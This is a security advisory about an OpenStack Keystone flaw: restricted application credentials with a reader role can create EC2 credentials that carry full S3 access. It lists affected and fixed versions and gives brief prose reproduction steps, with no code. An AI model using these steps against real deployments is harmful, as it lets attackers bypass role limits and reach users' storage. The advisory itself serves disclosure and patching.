OpenStack Keystone EC2 Credential Creation Privilege Escalation Vulnerability

A vulnerability exists in OpenStack Keystone versions 14 through 26 prior to 26.1.1, as well as in versions 27.0.0, 28.0.0, and 29.0.0. The issue allows restricted application credentials to create EC2 credentials. An authenticated user with only a reader role can use a restricted application credential to call the EC2 credential creation API, thereby obtaining an EC2/S3 credential that includes full access to the user's S3 permissions. This effectively bypasses the role restrictions of the application credential. The vulnerability affects deployments that use restricted application credentials with the EC2/S3 compatibility API (swift3/s3api).

Impact

Exploitation of this vulnerability allows for unauthorized EC2 credential creation, granting full access to the user's S3 buckets and bypassing role restrictions.

Reproduction

To reproduce this vulnerability, create a restricted application credential with a reader role in OpenStack Keystone. Then, use this credential to call the EC2 credential creation API. The created EC2 credential will have full access to the user's S3 permissions, allowing the creation of S3 buckets under the user's account.

Remediation

Users can upgrade to OpenStack Keystone versions 26.1.1, 27.0.1, 28.0.1, or 29.0.1, where this vulnerability has been fixed.